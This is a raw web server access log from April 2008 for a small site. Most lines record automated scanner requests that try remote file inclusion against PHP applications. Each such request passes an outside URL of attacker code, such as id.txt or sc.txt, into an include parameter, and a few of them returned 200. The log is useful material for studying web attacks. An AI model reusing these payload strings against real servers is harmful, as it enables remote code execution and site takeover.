87.117.252.170 - - [29/Apr/2008:12:07:52 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:12:07:59 -0700] "GET /logs/errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:12:07:59 -0700] "GET /errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.27 - - [29/Apr/2008:12:08:05 -0700] "GET /tmp/?M=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:12:08:06 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:12:08:06 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:08:19 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:12:08:28 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:12:08:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:12:08:39 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:08:40 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:08:40 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:08:41 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:08:53 -0700] "GET /logs/errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:08:54 -0700] "GET /errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:09:05 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:09:05 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:09:05 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:09:15 -0700] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:09:16 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:09:16 -0700] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:09:16 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:09:16 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:09:17 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.10.69.10 - - [29/Apr/2008:12:09:24 -0700] "GET /logs/access.log//?pag=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.10.69.10 - - [29/Apr/2008:12:09:30 -0700] "GET //?pag=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:09:31 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:09:31 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:09:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
87.10.69.10 - - [29/Apr/2008:12:09:32 -0700] "GET /logs//?pag=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 200 45273 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:12:09:42 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:09:42 -0700] "GET /logs/access_080121.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:12:09:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:09:42 -0700] "GET /logs/access_080121.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:07 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:07 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:12:10:08 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:12:10:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:10:16 -0700] "GET /logs/access_080329.log/index.php?sayfa=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:10:20 -0700] "GET /index.php?sayfa=http://www.webhostmedic.com/p.c?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:20 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:10:21 -0700] "GET /logs/index.php?sayfa=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:10:30 -0700] "GET /logs/access_080329.log/index.php?sayfa=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:10:31 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:10:31 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:10:31 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:12:10:31 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:12:10:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
65.55.211.39 - - [29/Apr/2008:12:10:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [29/Apr/2008:12:10:34 -0700] "GET /minamijewelry/bird.psd HTTP/1.1" 200 109644 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:10:35 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:10:35 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:10:35 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:10:35 -0700] "GET /logs/index.php?sayfa=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:10:37 -0700] "GET /index.php?sayfa=http://www.webhostmedic.com/p.c? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:10:40 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:10:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:10:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:49 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:49 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:49 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:12:10:52 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:12:10:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.244.69.79 - - [29/Apr/2008:12:10:53 -0700] "GET /logs/access_080215.loghttp://afterwedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:54 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:54 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:10:54 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:11:00 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:11:01 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:12:11:35 -0700] "GET /logs/access_080329.log/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:12:11:35 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:12:11:39 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:12:11:40 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:12:11:40 -0700] "GET /db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:11:41 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:11:41 -0700] "GET //atom.php5?page=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:11:41 -0700] "GET /logs//atom.php5?page=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:12:11:43 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:12:11:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:12:11:45 -0700] "GET /logs/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:11:54 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:11:54 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:11:55 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [29/Apr/2008:12:11:56 -0700] "GET /logs/access.log/index.php?sayfa=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:11:58 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:12:12:01 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:12:12:02 -0700] "GET /logs/access.log/index.php?sayfa=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [29/Apr/2008:12:12:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [29/Apr/2008:12:12:07 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:12:10 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:20 -0700] "GET /logs/access_080114.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:20 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:21 -0700] "GET /logs/access_080114.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:22 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:23 -0700] "GET /logs/access_080129.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:12:24 -0700] "GET /logs/access_080129.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:12:12:34 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:12:12:42 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.159 - - [29/Apr/2008:12:12:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.35 - - [29/Apr/2008:12:12:52 -0700] "GET /bikes/dteel/?N=D HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:12:12:55 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:12:12:55 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:12:12:55 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:12:12:56 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:12:12:58 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:12:12:59 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.76.116.20 - - [29/Apr/2008:12:13:04 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:12:13:15 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:12:13:32 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:12:13:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:13:38 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:12:13:40 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/vagabunss/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:12:13:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/vagabunss/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:14:31 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
